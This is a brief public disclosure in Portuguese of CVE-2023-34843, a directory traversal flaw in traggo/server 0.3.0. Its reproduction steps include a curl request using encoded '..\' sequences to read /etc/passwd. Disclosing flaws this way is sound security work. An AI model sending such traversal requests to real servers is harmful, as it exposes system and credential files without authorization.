
Divulgação pública para CVE-2023-34843.
Divulgação CVE-2023-34843
traggo/server versão 0.3.0 é vulnerável a traversal de diretório.
Passos para reproduzir:
Configure o traggo/server no seu endpoint/servidor. https://traggo.net/install/
Faça uma solicitação GET para a seguinte URL. curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
Veja o conteúdo de /etc/passwd